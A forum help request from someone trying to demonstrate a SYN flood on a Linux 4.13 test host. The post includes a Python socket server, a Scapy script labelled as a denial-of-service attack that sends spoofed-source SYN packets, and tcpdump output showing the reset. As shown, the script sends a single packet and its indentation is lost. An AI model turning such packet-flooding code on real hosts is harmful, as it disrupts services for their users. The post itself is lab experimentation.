Help
cancel
Showing results for 
Search instead for 
Did you mean: 
Ground Controller Lvl 1
Message 1 of 1

Need to simulate syn flood attack with the Linux kernel - 4.13.0-32-generic for demonstration purpos

Hi Team,

I trying to simulate a syn flood attack with Linux kernel 4.13.0-32-generic. I am able to see the syn and syn-ack packets via tcpdump but when I check "netstat -antp | grep tcp" I dint find any tcp connection with SYN_RECV state. Let me know what wrong I am doing here.

Server.py
#!/usr/bin/python
import socket

tcpsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsocket.bind(("1.1.1.1", 5555))
tcpsocket.listen(65534)
(client,(ip,port))=tcpsocket.accept()

client.py
#!/usr/bin/python

import logging
import signal
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *

client.py
def synFlood(dst_ip, dst_port):
src_net = "1.1.1."
signal.signal(signal.SIGINT, lambda n, f: sys.exit(0))

print("\n###########################################")
print("# Starting Denial of Service attack...")
print("# Target: {dst_ip}")
print("###########################################\n")
for src_host in range(2,3):
for src_port in range(1024, 1025):
# Build the packet
src_ip = src_net + str(src_host)
network_layer = IP(src=src_ip, dst=dst_ip)
transport_layer = TCP(sport=src_port, dport=dst_port)
# Send the packet
send(network_layer/transport_layer)
print("[+] Denial of Service attack finished.")

synFlood("1.1.1.1", 5555)

tcpdump output:
14:53:45.319036 IP 1.1.1.2.1024 > one.one.one.one.5555: Flags [S], seq 0, win 8192, length 0
14:53:45.319070 IP one.one.one.one.5555 > 1.1.1.2.1024: Flags [S.], seq 4072217564, ack 1, win 29200, options [mss 1460], length 0
14:53:45.319191 IP 1.1.1.2.1024 > one.one.one.one.5555: Flags [R], seq 1, win 0, length 0